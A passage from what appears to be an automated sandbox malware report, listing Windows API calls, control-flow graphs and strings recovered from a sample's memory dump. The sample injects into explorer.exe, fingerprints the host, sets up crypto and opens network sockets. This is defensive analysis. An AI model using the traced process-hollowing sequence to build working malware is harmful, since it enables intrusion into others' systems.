                • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 011F6065
                • WriteFile.KERNEL32(00000000,00000000,00000400,00000000,00000000), ref: 011F60AF
                • FlushFileBuffers.KERNEL32(00000000), ref: 011F60B7
                • SetEndOfFile.KERNEL32(00000000), ref: 011F60BE
                • NtQueryInformationProcess.NTDLL ref: 011F60D3
                • ReadProcessMemory.KERNEL32(00000000,?,?,00000480,00000000), ref: 011F60FB
                • VirtualAllocEx.KERNEL32(00000000,00000000,?,00003000,00000004), ref: 011F6152
                • WriteProcessMemory.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 011F618E
                • WriteProcessMemory.KERNEL32(00000000,?,?,00000004,00000000), ref: 011F619C
                • NtClose.NTDLL ref: 011F61D5
                • NtClose.NTDLL ref: 011F61E6
                • NtClose.NTDLL ref: 011F61F0
                • CloseHandle.KERNEL32(00000000), ref: 011F61F3
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.2121111372.00000000011F1000.00000020.00001000.00020000.00000000.sdmp, Offset: 011F0000, based on PE: true
                • Associated: 00000000.00000002.2121071666.00000000011F0000.00000002.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000000.00000002.2121201628.00000000011FB000.00000002.00001000.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_11f0000_DWbCUTdGhV.jbxd
                Yara matches
                Similarity
                • API ID: File$AddressProcProcess$CloseWrite$Memory$HandleInitPathPointerStringUnicodewnsprintf$AllocBuffersCombineCountCreateCurrentFlushInformationModuleQueryReadTempTickVirtual
                • String ID: "%s"$%08x%s$.exe$NtCreateProcessEx$NtCreateSection$NtCreateThreadEx$RtlCreateProcessParametersEx$RtlDestroyProcessParameters$ntdll
                • API String ID: 3548791621-756185880
                • Opcode ID: 9609eec604fdd15595130e9f444d2c262ae07b42381a4a5aa6342b2246f8f704
                • Instruction ID: 400ae6c507a7f46140e0c5068cdc0e1fe8548d50b91c3053cc48ae5dfe2a204e
                • Opcode Fuzzy Hash: 9609eec604fdd15595130e9f444d2c262ae07b42381a4a5aa6342b2246f8f704
                • Instruction Fuzzy Hash: F1B149B1A40219BBEB24DBA5CC49FAEBBBCEB44704F104069F715F7181D775AA40CB68

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 546 11f5af0-11f5b03 547 11f5b09-11f5b2a GetModuleHandleW GetProcAddress 546->547 548 11f5e58-11f5e60 546->548 547->548 549 11f5b30-11f5b41 547->549 549->548 550 11f5b47-11f5b4e 549->550 551 11f5b57-11f5b5a 550->551 552 11f5b50-11f5b55 550->552 551->548 554 11f5b60 551->554 553 11f5b65 552->553 555 11f5b67-11f5b70 553->555 554->553 555->555 556 11f5b72 555->556 557 11f5b74-11f5b80 556->557 557->557 558 11f5b82-11f5b88 557->558 559 11f5b90-11f5b9e 558->559 559->559 560 11f5ba0 559->560 561 11f5ba2-11f5bab 560->561 561->561 562 11f5bad-11f5be5 CreateProcessW 561->562 563 11f5e4f-11f5e57 562->563 564 11f5beb-11f5c2c NtQueryInformationProcess ReadProcessMemory GetThreadContext 562->564 565 11f5e3f-11f5e4d CloseHandle * 2 564->565 566 11f5c32-11f5c3f 564->566 565->563 566->565 568 11f5c45-11f5c94 VirtualAllocEx WriteProcessMemory 566->568 569 11f5ccc-11f5cd0 568->569 570 11f5c96-11f5ca7 568->570 571 11f5cd6-11f5ce0 569->571 572 11f5e00-11f5e39 WriteProcessMemory SetThreadContext ResumeThread 569->572 573 11f5cbd-11f5cc8 570->573 574 11f5ca9-11f5cbb WriteProcessMemory 570->574 571->572 575 11f5ce6-11f5ce8 571->575 572->565 573->570 576 11f5cca 573->576 574->573 577 11f5cf0-11f5cf8 575->577 576->569 577->577 578 11f5cfa-11f5d0d 577->578 579 11f5d0f-11f5d14 578->579 580 11f5d2e-11f5d3e 578->580 581 11f5d16-11f5d21 579->581 582 11f5de6-11f5df4 580->582 583 11f5d44-11f5d4f 580->583 581->582 585 11f5d27-11f5d29 581->585 582->575 584 11f5dfa 582->584 586 11f5d50-11f5d63 583->586 584->572 585->581 587 11f5d2b 585->587 588 11f5dde-11f5de0 586->588 589 11f5d69-11f5d6b 586->589 587->580 588->582 588->586 590 11f5d70-11f5d82 589->590 591 11f5d84-11f5dce ReadProcessMemory WriteProcessMemory 590->591 592 11f5dd0 590->592 593 11f5dd3-11f5dd9 591->593 592->593 593->590 594 11f5ddb 593->594 594->588
                APIs
                • GetModuleHandleW.KERNEL32(ntdll,NtUnmapViewOfSection), ref: 011F5B13
                • GetProcAddress.KERNEL32(00000000), ref: 011F5B1A
                • CreateProcessW.KERNEL32(C:\Windows\system32\explorer.exe,00000000,00000000,00000000,00000000,00000004,00000000,00000000,00000000,00000000), ref: 011F5BDD
                • NtQueryInformationProcess.NTDLL ref: 011F5BFA
                • ReadProcessMemory.KERNEL32(00000000,?,?,00000480,00000000), ref: 011F5C14
                • GetThreadContext.KERNEL32(?,00010007), ref: 011F5C24
                • VirtualAllocEx.KERNEL32(00000000,?,?,00003000,00000040), ref: 011F5C58
                • WriteProcessMemory.KERNEL32(00000000,00000000,?,?,00000000), ref: 011F5C82
                • WriteProcessMemory.KERNEL32(00000000,?,?,?,00000000,?,?,00000000), ref: 011F5CBB
                • ReadProcessMemory.KERNEL32(00000000,?,00000000,00000004,00000000,?,?,00000000), ref: 011F5DA2
                • WriteProcessMemory.KERNEL32(00000000,?,00000000,00000004,00000000,?,?,00000000), ref: 011F5DBA
                • WriteProcessMemory.KERNEL32(00000000,?,?,00000004,00000000,?,?,00000000), ref: 011F5E15
                • SetThreadContext.KERNEL32(?,00010007,?,?,00000000), ref: 011F5E30
                • ResumeThread.KERNEL32(?,?,?,00000000), ref: 011F5E39
                • CloseHandle.KERNEL32(?), ref: 011F5E48
                • CloseHandle.KERNEL32(00000000), ref: 011F5E4D
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.2121111372.00000000011F1000.00000020.00001000.00020000.00000000.sdmp, Offset: 011F0000, based on PE: true
                • Associated: 00000000.00000002.2121071666.00000000011F0000.00000002.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000000.00000002.2121201628.00000000011FB000.00000002.00001000.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_11f0000_DWbCUTdGhV.jbxd
                Yara matches
                Similarity
                • API ID: Process$Memory$Write$HandleThread$CloseContextRead$AddressAllocCreateInformationModuleProcQueryResumeVirtual
                • String ID: .reloc$C:\Windows\system32\certutil.exe$C:\Windows\system32\explorer.exe$NtUnmapViewOfSection$ntdll
                • API String ID: 918112823-4001407722
                • Opcode ID: 6c6f695117257abbefdd14b19fe3e28f4badc1b93f84835b902980df2ec13df1
                • Instruction ID: 42fdc572249cbbf03e91669f9dadac521cc2a24847848c2e7683c1ba3725f64a
                • Opcode Fuzzy Hash: 6c6f695117257abbefdd14b19fe3e28f4badc1b93f84835b902980df2ec13df1
                • Instruction Fuzzy Hash: 9EB18071E00219AFDF68CF98DC84BADBBB6FF48704F2440A9EA19E7291D7319941CB54

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 674 11f7650-11f7694 GetPEB LsaOpenPolicy 675 11f770b-11f7759 GetComputerNameW GetUserNameW 674->675 676 11f7696-11f76a7 LsaQueryInformationPolicy 674->676 677 11f776b-11f776d 675->677 678 11f775b 675->678 679 11f76a9-11f76af 676->679 680 11f7702-11f7705 LsaClose 676->680 682 11f7770-11f7788 call 11f24a0 677->682 681 11f7760-11f7769 678->681 683 11f76fb-11f76fc LsaFreeMemory 679->683 684 11f76b1-11f76cc GetProcessHeap HeapAlloc 679->684 680->675 681->677 681->681 691 11f778a-11f77f4 call 11f7440 wsprintfA * 2 682->691 683->680 686 11f76ce-11f76dc 684->686 687 11f76f8 684->687 689 11f76de-11f76e5 686->689 690 11f76f2-11f76f4 686->690 687->683 689->690 692 11f76e7-11f76f0 689->692 690->687 695 11f7807-11f783b call 11f66a0 691->695 696 11f77f6-11f7805 691->696 692->690 692->692 699 11f783d-11f7843 GetProcessHeap HeapFree 695->699 700 11f7845-11f7847 695->700 696->695 696->696 699->700 701 11f7849-11f784f GetProcessHeap HeapFree 700->701 702 11f7851-11f7857 700->702 701->702
                APIs
                • LsaOpenPolicy.ADVAPI32(00000000,011FA060,00000001,?), ref: 011F768C
                • LsaQueryInformationPolicy.ADVAPI32(?,0000000C,?), ref: 011F769F
                • GetProcessHeap.KERNEL32(00000008,?), ref: 011F76BB
                • HeapAlloc.KERNEL32(00000000), ref: 011F76C2
                • LsaFreeMemory.ADVAPI32(?), ref: 011F76FC
                • LsaClose.ADVAPI32(?), ref: 011F7705
                • GetComputerNameW.KERNEL32(?,?), ref: 011F7724
                • GetUserNameW.ADVAPI32(?,00000101), ref: 011F7735
                • wsprintfA.USER32 ref: 011F77B6
                • wsprintfA.USER32 ref: 011F77E9
                • GetProcessHeap.KERNEL32(00000000,00000000), ref: 011F7840
                • HeapFree.KERNEL32(00000000), ref: 011F7843
                • GetProcessHeap.KERNEL32(00000000,00000000), ref: 011F784C
                • HeapFree.KERNEL32(00000000), ref: 011F784F
                Strings
                • 0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ, xrefs: 011F7746
                • %s|%d.%d (%d)|%S|%S|%S, xrefs: 011F77E3
                • %d|%s|%.16s|, xrefs: 011F77B0
                Memory Dump Source
                • Source File: 00000000.00000002.2121111372.00000000011F1000.00000020.00001000.00020000.00000000.sdmp, Offset: 011F0000, based on PE: true
                • Associated: 00000000.00000002.2121071666.00000000011F0000.00000002.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000000.00000002.2121201628.00000000011FB000.00000002.00001000.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_11f0000_DWbCUTdGhV.jbxd
                Yara matches
                Similarity
                • API ID: Heap$FreeProcess$NamePolicywsprintf$AllocCloseComputerInformationMemoryOpenQueryUser
                • String ID: %d|%s|%.16s|$%s|%d.%d (%d)|%S|%S|%S$0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ
                • API String ID: 3257352186-369990036
                • Opcode ID: ffed4d8f630f1361bc6dac470acacf380f755d52a6f2c0616f6b8c92a898ff0b
                • Instruction ID: 3343023365d9a536b115027071de7f3c9d71526c8449c66f271f199e5ed9e72b
                • Opcode Fuzzy Hash: ffed4d8f630f1361bc6dac470acacf380f755d52a6f2c0616f6b8c92a898ff0b
                • Instruction Fuzzy Hash: D751C271A00259AFEB29CFA4CD44BEEBFB9BF44704F0441ADEA44E7141D7709A45CBA0

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 703 11f7860-11f7874 704 11f78d8-11f78f0 703->704 705 11f7876-11f787e 703->705 706 11f78fa-11f78fc 704->706 707 11f78f2-11f78f8 704->707 705->704 708 11f7880-11f7888 705->708 709 11f7900-11f7915 call 11f24a0 706->709 707->706 707->707 710 11f7890-11f789a 708->710 720 11f7917-11f7978 call 11f7440 wnsprintfA wsprintfA 709->720 712 11f789c-11f789e 710->712 713 11f78a7-11f78ae StrCmpNIA 710->713 712->713 714 11f78a0-11f78a5 712->714 715 11f78c1-11f78d2 713->715 716 11f78b0-11f78bd 713->716 714->713 714->714 715->704 719 11f7d44-11f7d4a 715->719 716->710 718 11f78bf 716->718 718->704 723 11f797a 720->723 724 11f7991-11f79ba call 11f66a0 720->724 726 11f7980-11f798f 723->726 724->719 728 11f79c0 724->728 726->724 726->726 729 11f79c2-11f79cb 728->729 730 11f79d0-11f79d8 729->730 731 11f79da-11f79dc 730->731 732 11f79e0-11f79e2 730->732 731->730 733 11f79de 731->733 734 11f79f5-11f79fb 732->734 735 11f79e4-11f79f0 732->735 733->729 737 11f7a00-11f7a08 734->737 736 11f7aaa-11f7abb 735->736 738 11f7d32-11f7d3e GetProcessHeap HeapFree 736->738 739 11f7ac1-11f7ac3 736->739 740 11f7a0a-11f7a0c 737->740 741 11f7a10-11f7a12 737->741 738->719 739->738 742 11f7ac9-11f7ad0 739->742 740->737 743 11f7a0e 740->743 744 11f7a18 741->744 745 11f7a14-11f7a16 741->745 742->738 747 11f7ad6 742->747 743->734 746 11f7a1b-11f7a23 744->746 745->746 748 11f7a25-11f7a2c 746->748 749 11f7a31 746->749 750 11f7ad8-11f7ae3 747->750 748->736 751 11f7a34-11f7a3f 749->751 750->750 752 11f7ae5-11f7af4 call 11f7440 750->752 753 11f7a40-11f7a48 751->753 761 11f7b07-11f7b0d 752->761 762 11f7af6-11f7b05 752->762 755 11f7a4a-11f7a4c 753->755 756 11f7a50-11f7a52 753->756 755->753 758 11f7a4e 755->758 759 11f7a54-11f7a5e 756->759 760 11f7a60-11f7a6b 756->760 758->751 765 11f7aa7 759->765 766 11f7a70-11f7a78 760->766 763 11f7d2b-11f7d2d call 11f5af0 761->763 764 11f7b13-11f7b16 761->764 762->761 762->762 763->738 767 11f7b1c-11f7b1f 764->767 768 11f7d20-11f7d29 call 11f5e70 764->768 765->736 770 11f7a7a-11f7a7c 766->770 771 11f7a80-11f7a82 766->771 767->738 773 11f7b25-11f7b2a 767->773 768->738 770->766 774 11f7a7e 770->774 775 11f7a88 771->775 776 11f7a84-11f7a86 771->776 773->738 779 11f7b30-11f7b38 773->779 774->760 777 11f7a8b-11f7a95 775->777 776->777 777->765 780 11f7a97-11f7a99 777->780 781 11f7b4a-11f7b4e 779->781 782 11f7b3a 779->782 780->765 783 11f7a9b 780->783 785 11f7b62-11f7b6c 781->785 786 11f7b50-11f7b60 781->786 784 11f7b40-11f7b48 782->784 787 11f7aa0-11f7aa5 783->787 784->781 784->784 788 11f7b70-11f7b78 785->788 786->785 786->786 787->765 787->787 788->788 789 11f7b7a-11f7b7e 788->789 790 11f7b92-11f7ba8 call 11f58c0 789->790 791 11f7b80-11f7b90 789->791 790->738 794 11f7bae-11f7bd5 790->794 791->790 791->791 794->738 795 11f7bdb 794->795 796 11f7be0-11f7bf3 lstrcmpA 795->796 797 11f7c06-11f7c18 796->797 798 11f7bf5-11f7bff 796->798 797->738 800 11f7c1e-11f7c22 797->800 798->796 799 11f7c01 798->799 799->738 801 11f7c2b-11f7c58 EnterCriticalSection 800->801 802 11f7c24-11f7c29 800->802 804 11f7c5a-11f7c62 801->804 805 11f7c78-11f7c7c 801->805 802->801 802->802 806 11f7c65-11f7c68 804->806 807 11f7c7e 805->807 808 11f7c94-11f7ca4 805->808 812 11f7c6a-11f7c70 806->812 813 11f7c72 806->813 809 11f7c80-11f7c84 807->809 810 11f7cb7-11f7cc1 GetProcessHeap HeapReAlloc 808->810 811 11f7ca6-11f7cb5 GetProcessHeap HeapAlloc 808->811 814 11f7c86-11f7c8c 809->814 815 11f7c90-11f7c92 809->815 816 11f7cc7-11f7cd1 810->816 811->816 812->806 812->813 813->805 814->809 817 11f7c8e 814->817 815->808 818 11f7cea-11f7cf1 815->818 819 11f7d13-11f7d1e LeaveCriticalSection 816->819 820 11f7cd3-11f7ce7 816->820 817->808 821 11f7d0f 818->821 822 11f7cf3-11f7cf5 818->822 819->738 820->818 821->819 823 11f7cfe-11f7d02 822->823 824 11f7cf7-11f7cfc 822->824 823->821 825 11f7d04-11f7d0d 823->825 824->823 824->824 825->821 825->825
                APIs
                • StrCmpNIA.SHLWAPI(?,?,00000000), ref: 011F78AA
                • wnsprintfA.SHLWAPI ref: 011F7942
                • wsprintfA.USER32 ref: 011F7969
                • lstrcmpA.KERNEL32(?,Start), ref: 011F7BEB
                • EnterCriticalSection.KERNEL32(011FA080), ref: 011F7C44
                • GetProcessHeap.KERNEL32(00000008,?), ref: 011F7CA8
                • HeapAlloc.KERNEL32(00000000), ref: 011F7CAF
                • GetProcessHeap.KERNEL32(00000008,?,?), ref: 011F7CBA
                • HeapReAlloc.KERNEL32(00000000), ref: 011F7CC1
                • LeaveCriticalSection.KERNEL32(011FA080), ref: 011F7D18
                  • Part of subcall function 011F5E70: GetModuleHandleW.KERNEL32(ntdll), ref: 011F5E8D
                  • Part of subcall function 011F5E70: GetProcAddress.KERNEL32(00000000,NtCreateSection), ref: 011F5EA1
                  • Part of subcall function 011F5E70: GetProcAddress.KERNEL32(00000000,NtCreateProcessEx), ref: 011F5EAC
                  • Part of subcall function 011F5E70: GetProcAddress.KERNEL32(00000000,RtlCreateProcessParametersEx), ref: 011F5EB7
                  • Part of subcall function 011F5E70: GetProcAddress.KERNEL32(00000000,RtlDestroyProcessParameters), ref: 011F5EC2
                  • Part of subcall function 011F5E70: GetProcAddress.KERNEL32(00000000,NtCreateThreadEx), ref: 011F5ECD
                  • Part of subcall function 011F5E70: GetTempPathW.KERNEL32(000000F6,?), ref: 011F5EE6
                  • Part of subcall function 011F5E70: wnsprintfW.SHLWAPI ref: 011F5F21
                  • Part of subcall function 011F5E70: PathCombineW.SHLWAPI(?,?,?), ref: 011F5F3B
                  • Part of subcall function 011F5E70: CreateFileW.KERNEL32(?,C0000000,00000007,00000000,00000002,00000080,00000000), ref: 011F5F62
                  • Part of subcall function 011F5E70: WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 011F5F86
                  • Part of subcall function 011F5E70: SetEndOfFile.KERNEL32(00000000), ref: 011F5F89
                  • Part of subcall function 011F5E70: SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 011F5F96
                  • Part of subcall function 011F5E70: wnsprintfW.SHLWAPI ref: 011F5FB4
                • GetProcessHeap.KERNEL32(00000000,?), ref: 011F7D37
                • HeapFree.KERNEL32(00000000), ref: 011F7D3E
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.2121111372.00000000011F1000.00000020.00001000.00020000.00000000.sdmp, Offset: 011F0000, based on PE: true
                • Associated: 00000000.00000002.2121071666.00000000011F0000.00000002.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000000.00000002.2121201628.00000000011FB000.00000002.00001000.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_11f0000_DWbCUTdGhV.jbxd
                Yara matches
                Similarity
                • API ID: Heap$AddressProc$File$Processwnsprintf$AllocCriticalPathSection$CombineCreateEnterFreeHandleLeaveModulePointerTempWritelstrcmpwsprintf
                • String ID: %d|%s|%.16s|$%s|%s$0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ$Start
                • API String ID: 851647271-3778496198
                • Opcode ID: 58dd2ce40fdf4c3160d6902cbab1218f8ba6b8e6136d34bbdddddb06c4f0450f
                • Instruction ID: 03ea44d278ec40087fa91d80a7021ad1b962849c89c137f6487a6f7c86787377
                • Opcode Fuzzy Hash: 58dd2ce40fdf4c3160d6902cbab1218f8ba6b8e6136d34bbdddddb06c4f0450f
                • Instruction Fuzzy Hash: AEE11431E042568FEB2D8F68D854B7E7BB2BF85200F1D81ADCB5697286DB309945CB90
                APIs
                • InitializeCriticalSection.KERNEL32(011FA080), ref: 011F8362
                  • Part of subcall function 011F7010: RegOpenKeyExW.ADVAPI32(80000002,SOFTWARE\Microsoft\Cryptography,00000000,00000001,80000002), ref: 011F7047
                  • Part of subcall function 011F7010: RegQueryValueExW.ADVAPI32(80000002,MachineGuid,00000000,?,00000000,?), ref: 011F7063
                  • Part of subcall function 011F7010: GetProcessHeap.KERNEL32(00000008,?), ref: 011F7072
                  • Part of subcall function 011F7010: HeapAlloc.KERNEL32(00000000), ref: 011F7079
                  • Part of subcall function 011F7010: RegQueryValueExW.ADVAPI32(80000002,MachineGuid,00000000,00000000,00000000,?), ref: 011F7096
                  • Part of subcall function 011F7010: RegCloseKey.ADVAPI32(80000002), ref: 011F70A8
                • GetVolumeInformationW.KERNEL32(C:\,00000000,00000000,?,00000000,00000000,00000000,00000000), ref: 011F838F
                • StringFromGUID2.OLE32(?,?,00000080), ref: 011F83E8
                • wsprintfA.USER32 ref: 011F83FF
                • CreateMutexW.KERNEL32(00000000,00000001,?), ref: 011F8413
                • GetLastError.KERNEL32 ref: 011F841E
                • ExitProcess.KERNEL32 ref: 011F8523
                  • Part of subcall function 011F24A0: GetTickCount.KERNEL32 ref: 011F24A2
                • WSAStartup.WS2_32(00000202,?), ref: 011F845C
                • CryptAcquireContextA.ADVAPI32(011FA4EC,00000000,Microsoft Enhanced RSA and AES Cryptographic Provider,00000018,F0000000), ref: 011F8475
                • CryptAcquireContextA.ADVAPI32(011FA4EC,00000000,Microsoft Enhanced RSA and AES Cryptographic Provider,00000018,F0000008), ref: 011F8491
                • CoInitializeEx.OLE32(00000000,00000000), ref: 011F84DC
                • ExpandEnvironmentStringsW.KERNEL32(%temp%\%paths%,?,00000104), ref: 011F84F3
                • CreateFileW.KERNEL32(?,10000000,00000000,00000000,00000002,04000080,00000000), ref: 011F8512
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.2121111372.00000000011F1000.00000020.00001000.00020000.00000000.sdmp, Offset: 011F0000, based on PE: true
                • Associated: 00000000.00000002.2121071666.00000000011F0000.00000002.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000000.00000002.2121201628.00000000011FB000.00000002.00001000.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_11f0000_DWbCUTdGhV.jbxd
                Yara matches
                Similarity
                • API ID: AcquireContextCreateCryptHeapInitializeProcessQueryValue$AllocCloseCountCriticalEnvironmentErrorExitExpandFileFromInformationLastMutexOpenSectionStartupStringStringsTickVolumewsprintf
                • String ID: %temp%\%paths%$C:\$Microsoft Enhanced RSA and AES Cryptographic Provider
                • API String ID: 267019445-2941900213
                • Opcode ID: 512abd2c72c6a8ef7620e184b7baa08d38830858ad46ba7e0f121fc2fe39ded5
                • Instruction ID: 46b789ce2858a4fc54f73b725c299fdb5e7b4d195cd275a251d22b1e34d6ca6c
                • Opcode Fuzzy Hash: 512abd2c72c6a8ef7620e184b7baa08d38830858ad46ba7e0f121fc2fe39ded5
                • Instruction Fuzzy Hash: 2141C170A48308BAE728DF60ED0EFA97678BB04705F14806DF719EA185EBB456848B59
                APIs
                • InitializeCriticalSection.KERNEL32(011FA080), ref: 011F8362
                • GetVolumeInformationW.KERNEL32(C:\,00000000,00000000,?,00000000,00000000,00000000,00000000), ref: 011F838F
                • StringFromGUID2.OLE32(?,?,00000080), ref: 011F83E8
                • wsprintfA.USER32 ref: 011F83FF
                • CreateMutexW.KERNEL32(00000000,00000001,?), ref: 011F8413
                • GetLastError.KERNEL32 ref: 011F841E
                • WSAStartup.WS2_32(00000202,?), ref: 011F845C
                • CryptAcquireContextA.ADVAPI32(011FA4EC,00000000,Microsoft Enhanced RSA and AES Cryptographic Provider,00000018,F0000000), ref: 011F8475
                • CryptAcquireContextA.ADVAPI32(011FA4EC,00000000,Microsoft Enhanced RSA and AES Cryptographic Provider,00000018,F0000008), ref: 011F8491
                • CoInitializeEx.OLE32(00000000,00000000), ref: 011F84DC
                • ExpandEnvironmentStringsW.KERNEL32(%temp%\%paths%,?,00000104), ref: 011F84F3
                • CreateFileW.KERNEL32(?,10000000,00000000,00000000,00000002,04000080,00000000), ref: 011F8512
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.2121111372.00000000011F1000.00000020.00001000.00020000.00000000.sdmp, Offset: 011F0000, based on PE: true
                • Associated: 00000000.00000002.2121071666.00000000011F0000.00000002.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000000.00000002.2121201628.00000000011FB000.00000002.00001000.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_11f0000_DWbCUTdGhV.jbxd
                Yara matches
                Similarity
                • API ID: AcquireContextCreateCryptInitialize$CriticalEnvironmentErrorExpandFileFromInformationLastMutexSectionStartupStringStringsVolumewsprintf
                • String ID: %temp%\%paths%$C:\$Microsoft Enhanced RSA and AES Cryptographic Provider
                • API String ID: 3830145718-2941900213
                • Opcode ID: 856c8239a2694351da8fa4265c9f3ea6f5def2290e477dbf5bd04d997cc4f9c1
                • Instruction ID: 0316a80820972987fed0524559fa471dac525c959d88767871d5aab826825ca9
                • Opcode Fuzzy Hash: 856c8239a2694351da8fa4265c9f3ea6f5def2290e477dbf5bd04d997cc4f9c1
                • Instruction Fuzzy Hash: 5E51D370A44309ABE72CCF60EC4AF9977B8FF04704F14807DE619EB185EBB456448B48
                APIs
                • inet_pton.WS2_32(00000002,?,?), ref: 011F62D0
                • htons.WS2_32(?), ref: 011F62EC
                • inet_pton.WS2_32(00000002,?,?), ref: 011F62FE
                • htons.WS2_32(?), ref: 011F6305
                • socket.WS2_32(00000002,00000001,00000006), ref: 011F6318
                • connect.WS2_32(00000000,?,00000010), ref: 011F6333
                • socket.WS2_32(00000002,00000001,00000006), ref: 011F6344
                • connect.WS2_32(00000000,?,00000010), ref: 011F6359
                • select.WS2_32(00000000,?), ref: 011F6381
                • recv.WS2_32(?,?,00000400,00000000), ref: 011F63B4
                • send.WS2_32(00000000,?,00000000,00000000), ref: 011F63DA
                • select.WS2_32(00000000,00000002,00000000,00000000,00000000), ref: 011F640C
                • closesocket.WS2_32(00000000), ref: 011F6422
                • closesocket.WS2_32(00000000), ref: 011F6429
                • GetProcessHeap.KERNEL32(00000000,?), ref: 011F6434
                • HeapFree.KERNEL32(00000000), ref: 011F643B
                Memory Dump Source
                • Source File: 00000000.00000002.2121111372.00000000011F1000.00000020.00001000.00020000.00000000.sdmp, Offset: 011F0000, based on PE: true
                • Associated: 00000000.00000002.2121071666.00000000011F0000.00000002.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000000.00000002.2121201628.00000000011FB000.00000002.00001000.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_11f0000_DWbCUTdGhV.jbxd
                Yara matches
                Similarity
                • API ID: Heapclosesocketconnecthtonsinet_ptonselectsocket$FreeProcessrecvsend
                • String ID:
                • API String ID: 1922096520-0
                • Opcode ID: b46dcdfb5db8e88867fb6acc61763efb765a90aa0468c4646ce0b882709b2269
                • Instruction ID: 9461443902129a16312f99f663f4569f2ee8b203b1b9358215e68bafd9c1ab48
                • Opcode Fuzzy Hash: b46dcdfb5db8e88867fb6acc61763efb765a90aa0468c4646ce0b882709b2269
                • Instruction Fuzzy Hash: B1417C71148304ABD724AFA4DC89B6ABBEDEB88710F10092EF755D71D0D3B0D8458B66
                APIs
                • CryptGenRandom.ADVAPI32(00000020,?), ref: 011F8F58
                  • Part of subcall function 011F2640: GetProcessHeap.KERNEL32(00000008,AAAAAAAB,?,?,?,?,011F8FA5,00000000), ref: 011F2662
                  • Part of subcall function 011F2640: HeapAlloc.KERNEL32(00000000,?,?,?,?,011F8FA5,00000000), ref: 011F2669
                • GetProcessHeap.KERNEL32(00000000,00000000), ref: 011F8FB5
                • HeapFree.KERNEL32(00000000), ref: 011F8FBC
                • wsprintfA.USER32 ref: 011F8FEF
                • GetProcessHeap.KERNEL32(00000000,00000000), ref: 011F9028
                • HeapFree.KERNEL32(00000000), ref: 011F902B
                • GetProcessHeap.KERNEL32(00000000,00000000), ref: 011F9030
                • HeapFree.KERNEL32(00000000), ref: 011F9033
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.2121111372.00000000011F1000.00000020.00001000.00020000.00000000.sdmp, Offset: 011F0000, based on PE: true
                • Associated: 00000000.00000002.2121071666.00000000011F0000.00000002.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000000.00000002.2121201628.00000000011FB000.00000002.00001000.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_11f0000_DWbCUTdGhV.jbxd
                Yara matches
                Similarity
                • API ID: Heap$Process$Free$AllocCryptRandomwsprintf
                • String ID: %d|%s|%s|%s$VoYGkc5R
                • API String ID: 4113358155-4073333701
                • Opcode ID: ff0fb8acda50ab541396a772b3b2cc02c6b3ccfebe987ee005ce8c1520f4938c
                • Instruction ID: 05185ac6f14bc8dded7ab47d71ba6db284c6fd7916c366c45761a47e349ffc29
                • Opcode Fuzzy Hash: ff0fb8acda50ab541396a772b3b2cc02c6b3ccfebe987ee005ce8c1520f4938c
                • Instruction Fuzzy Hash: B5210871E043086BE728ABA4EC09FEF7B3DDF44614F04012CEB18A7185EB659915C7A6
                APIs
                • GetCurrentProcess.KERNEL32(00000028,?), ref: 011F621D
                • OpenProcessToken.ADVAPI32(00000000), ref: 011F6224
                • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 011F6239
                • CloseHandle.KERNEL32(?), ref: 011F6246
                • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 011F6270
                • CloseHandle.KERNEL32(?), ref: 011F627B
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.2121111372.00000000011F1000.00000020.00001000.00020000.00000000.sdmp, Offset: 011F0000, based on PE: true
                • Associated: 00000000.00000002.2121071666.00000000011F0000.00000002.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000000.00000002.2121201628.00000000011FB000.00000002.00001000.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_11f0000_DWbCUTdGhV.jbxd
                Yara matches
                Similarity
                • API ID: CloseHandleProcessToken$AdjustCurrentLookupOpenPrivilegePrivilegesValue
                • String ID: SeShutdownPrivilege
                • API String ID: 158869116-3733053543
                • Opcode ID: 901ede800b86963bba1ef4a6e873e1d648c13f5fe61ba17a7b64dfd7d341bf97
                • Instruction ID: a4cc7de8db9d5b81b0e5c55b78b39d469cf7c1fd111334f7fcfddf2a309823bb
